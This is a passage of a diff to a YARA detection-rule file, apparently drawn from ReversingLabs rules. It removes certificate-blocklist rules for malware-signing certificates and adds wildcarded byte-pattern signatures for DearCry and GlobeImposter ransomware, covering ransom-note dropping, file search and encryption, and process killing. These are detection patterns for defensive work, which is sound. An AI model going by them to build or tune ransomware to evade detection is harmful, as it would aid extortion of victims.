+            ?? 85 C0 75 ?? 6A ?? 58 EB ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D
+            C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BUSTER ASSISTENCIA TECNICA ELETRONICA LTDA - ME" and pe.signatures [ i ] . serial == "0a:38:9b:95:ee:73:6d:d1:3b:c0:ed:74:3f:d7:4d:2f" and 1351814399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1A3Faaeb3A8B93B2394Fec36345996E6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dearcry : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DearCry ransomware."
 		author = "ReversingLabs"
-		id = "343e4dbe-21a6-5758-be81-e5e7918c54fa"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6e2097e0-6495-5185-bbbc-e8168fa0ca7f"
+		date = "2021-03-12"
+		modified = "2021-03-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L657-L673"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DearCry.yara#L1-L96"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a3bd9aaba8dbdb340b5d3013684584524eb08b11339985ba6ca0291b8c8bc692"
+		logic_hash = "40dde232255018e1bc0aadf2378a7a86a99327d13dda58d8ffc5bb38e164de26"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DearCry"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "salvatore macchiarella" and pe.signatures [ i ] . serial == "1a:3f:aa:eb:3a:8b:93:b2:39:4f:ec:36:34:59:96:e6" and 1468454400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1A35Acce5B0C77206B1C3Dc2A6A2417C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "0e42ffb8-07f2-55e4-977d-7760e923d76d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L675-L691"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ce161fdd511e0efa042516ead09c6ab5f8dcf54f2087cdccbfed8e7cdfbd25b2"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cd ingegneri associati srl" and pe.signatures [ i ] . serial == "1a:35:ac:ce:5b:0c:77:20:6b:1c:3d:c2:a6:a2:41:7c" and 1166054399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6Eb40Ea11Eaac847B050De9B59E25Bdc : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "e9f94ae9-0158-5789-b4d2-88f750442274"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L693-L709"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d0e7ab78fb42c9a8f19cba8e6a8b15d584651a23f1088e1f311589d46145e963"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "My Free Internet Update" and pe.signatures [ i ] . serial == "6e:b4:0e:a1:1e:aa:c8:47:b0:50:de:9b:59:e2:5b:dc" and 1062201599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6724340Ddbc7252F7Fb714B812A5C04D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "2b61de88-9fea-5c3f-a7ab-db91e90b4965"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L711-L727"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bc72c2ca5f81198684233e23260831da5b9ef4e7ac5a25abbdb303eecc38bd53"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$drop_ransom_note_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 50 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ??
+            ?? ?? 89 1D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 89 74 24 ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ??
+            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 3B F3 0F 84 ?? ?? ?? ?? 3B FB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 5C 24 ?? B8 ?? ?? ?? ?? 33 F6 8B FF
+            38 18 74 ?? 50 E8 ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 C4 ?? 8B D7 8A 08 88 0A 40 42 84
+            C9 75 ?? 8B C7 33 F6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 74 ?? 0F BE 14 37 52 E8 ??
+            ?? ?? ?? 88 04 37 8B C7 83 C4 ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ??
+            8B 74 24 ?? 46 89 74 24 ?? 69 F6 ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 3B C3 75 ?? 6A ?? 68
+        }
+		$drop_ransom_note_p2 = {
+            89 5C 24 ?? E8 ?? ?? ?? ?? 53 8B F0 53 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 56 89 44 24
+            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B F8 3B C3 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 53 51 88 5C 24 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8A 44 1C ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 0F 8C ?? ?? ?? ?? 3C ?? 0F 8F ?? ?? ?? ??
+            0F BE C0 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ??
+            8D 54 24 ?? 52 FF D6 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B
+            4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 51 52 50 6A ?? 8D 4C 24 ?? 51 57 E8 ?? ?? ?? ?? 0F
+            BE 54 1C ?? 68 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? B8 ?? ?? ?? ?? 8D 50
+            ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 56 2B C2 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 43 81 FB ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 33 DB 57
+        }
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64
+            A3 ?? ?? ?? ?? 89 65 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 75 ?? 89 B5 ?? ?? ?? ?? 8B 4D
+            ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ??
+            8B C6 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 8B C6 8D 50
+            ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 EB ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A
+            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B C6
+            8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 78 ?? 8A 08 40 84 C9
+            75 ?? 2B C7 03 C2 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B C3 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 83 F8 ?? 76 ?? B8 ?? ?? ??
+            ?? EB ?? 8B C3 8D 50 ?? 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 53 8D 55 ?? 52 E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? 33 FF 8D 45 ?? 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 74 ?? EB ?? 8D 49 ??
+            0F BE 44 3D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 3D ?? 47 8D 45 ?? 8D 50 ?? 8D A4 24
+            ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F8 72 ?? 8D 4D ?? 51 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A
+            11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB
+            ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B
+            C2 80 7C 30 ?? ?? 74 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 30 ?? ?? 74
+            ?? 8D 85 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? 8D 95 ?? ?? ??
+            ?? 52 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? 6A ?? 8B 9D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 57 8B 55 ??
+            52 8D BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ??
+            E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 65 ?? C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 8D 50 ?? 8B FF
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YNK JAPAN Inc" and pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" and 1306195199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $drop_ransom_note_p* ) ) and ( all of ( $find_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0813Ee9B7B9D7C46001D6Bc8784Df1Dd : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Globeimposter : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GlobeImposter ransomware."
 		author = "ReversingLabs"
-		id = "0915fae0-ac6f-5a92-ab44-80f840fd5061"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6634a554-b4bb-503d-a4f1-9997b4caa1f0"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L729-L745"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GlobeImposter.yara#L1-L171"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1a25a2f25fa8d5075113cbafb73e80e741268d6b2f9e629fd54ffca9e82409b0"
+		logic_hash = "4345a767f270428f3b509fdad5a96bf9b494b190d3a836c4bf53dfd75da5bacb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GlobeImposter"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Les Garcons s'habillent" and pe.signatures [ i ] . serial == "08:13:ee:9b:7b:9d:7c:46:00:1d:6b:c8:78:4d:f1:dd" and 1334707199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_530591C61B5E1212F659138B7Cea0A97 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "71cf0653-5aab-5d5c-aa3a-f42f40196412"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L747-L763"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ef01e542d145475713bbd373bdcdae5f25bfd823a60e7d40fe9a6b6039c83e0"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_1 = {
+            81 EC ?? ?? ?? ?? 83 24 24 ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 44 24
+            ?? 50 E8 ?? ?? ?? ?? 8D 04 24 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 8B 1D ??
+            ?? ?? ?? 55 56 57 8B 3D ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 89 74 24 ?? FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84
+            74 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8
+            ?? ?? ?? ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ??
+            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
+            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ??
+            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF B4 24
+            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ??
+            50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50
+            55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
+        }
+		$search_files_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B F8 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6
+            8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A
+            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89
+            04 B7 51 50 FF 15 ?? ?? ?? ?? 46 FE 85 ?? ?? ?? ?? D1 EB 75 ?? EB ?? 68 ?? ?? ?? ??
+            FF 34 B7 FF 15 ?? ?? ?? ?? 85 C0 74
+        }
+		$encrypt_files_2 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 24 24 ?? 53 55 56 57 E8 ?? ?? ?? ?? 8B D0 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 7C 24 ??
+            FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 7C ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F8 33 D2 F6 44
+            24 ?? ?? 8B CF 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 50 FF D3 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            42 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
+            ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 51 6A ?? 5A 8B
+            CF E8 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ??
+            ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 7C 24 ?? 59 8D 44 24 ??
+            50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
+        }
+		$kill_specific_processes_2 = {
+            81 EC ?? ?? ?? ?? 56 57 6A ?? 5E 56 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89
+            74 24 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 53 55 BE ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B E8 33 D2 85 ED 7E ?? 0F BE 0C 1A E8 ?? ?? ?? ?? 88 04 1A 42 3B D5 7C ?? FF 36
+            53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 85 C0 74 ?? 33 DB
+            53 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? FF B4
+            24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D
+            44 24 ?? 50 53 53 68 ?? ?? ?? ?? 53 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ??
+            ?? ?? ?? 5D 5B 5F 5E 81 C4 ?? ?? ?? ?? C2
+        }
+		$kill_specific_processes_1 = {
+            81 EC ?? ?? ?? ?? 55 56 57 6A ?? 5E 56 33 ED 8D 44 24 ?? 55 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF ?? 0F 84 ?? ?? ?? ??
+            53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 8B 5C
+            24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 ?? 85 C0 7E ?? 8B F8
+            0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 ?? ?? ?? ?? FF 34 B0
+            55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? ?? ?? 7C ?? 8B 7C 24
+            ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 50 FF
